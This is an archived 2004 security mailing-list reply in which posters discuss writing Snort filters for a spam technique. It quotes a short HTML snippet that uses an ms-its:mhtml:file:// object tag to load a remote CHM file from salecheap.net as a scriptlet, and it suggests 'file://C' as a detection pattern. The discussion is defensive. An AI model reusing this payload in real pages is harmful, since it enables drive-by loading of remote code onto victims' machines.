Re: A new technique to disguise a target URL in spam

From: Jeremiah Cornelius (jeremiah_at_nur.net)
Date: 04/06/04

  • Next message: Michael Ducy: "KdS terminal logger"
    To: incidents@securityfocus.com
    Date: Mon, 5 Apr 2004 18:09:59 -0700
    
    

    On Monday 05 April 2004 10:43, Stef wrote:
    > >       <object data="ms-its:mhtml:file://C
    > >       \\MAIN.MHT!http://salecheap.net//main.chm::/main.htm"
    > >       type="text/x-scriptlet"></object>
    > >       </body>
    > >       </html>
    > >       test.htm (END)
    >
    > Now how would one go about writing filters for - let's say - Snort -
    > based on something like this? Could it be - in pseudo-code - something
    > like: if location.ref <> src ==> then "take action"? Would it be safe
    > to assume that everything where the location.ref is different than src
    > is malicious?

    I would start looking at the "low-hanging fruit"...

    file://C might be a decent expression to trigger any kind of action.

    ---------------------------------------------------------------------------
    Free 30-day trial: firewall with virus/spam protection, URL filtering, VPN,
    wireless security

    Protect your network against hackers, viruses, spam and other risks with Astaro
    Security Linux, the comprehensive security solution that combines six
    applications in one software solution for ease of use and lower total cost of
    ownership.

    Download your free trial at
    http://www.securityfocus.com/sponsor/Astaro_incidents_040301
    ----------------------------------------------------------------------------


  • Next message: Michael Ducy: "KdS terminal logger"

    Relevant Pages

    • Re: blocking p2p traffic
      ... Network Security Specialist ... firewall with virus/spam protection, ... the comprehensive security solution that combines six ...
      (Focus-IDS)
    • RE: A new technique to disguise a target URL in spam
      ... I have seen the same technique used in other emails, ... firewall with virus/spam protection, URL filtering, VPN, ... Security Linux, the comprehensive security solution that combines six ...
      (Incidents)
    • RE: help with exchange
      ... Subject: help with exchange ... firewall with virus/spam protection, URL filtering, VPN, ... Security Linux, the comprehensive security solution that combines six ...
      (Security-Basics)
    • Re: help with exchange
      ... You can download an evaluation copy to see if its any use. ... Security Linux, the comprehensive security solution that combines six ... firewall with virus/spam protection, URL filtering, VPN, ...
      (Security-Basics)
    • RE: process tracking
      ... Snare to generate syslog messages to feed into KIWI Syslog and set up ... firewall with virus/spam protection, URL filtering, VPN, ... Astaro Security Linux, the comprehensive security solution that combines six ...
      (Focus-Microsoft)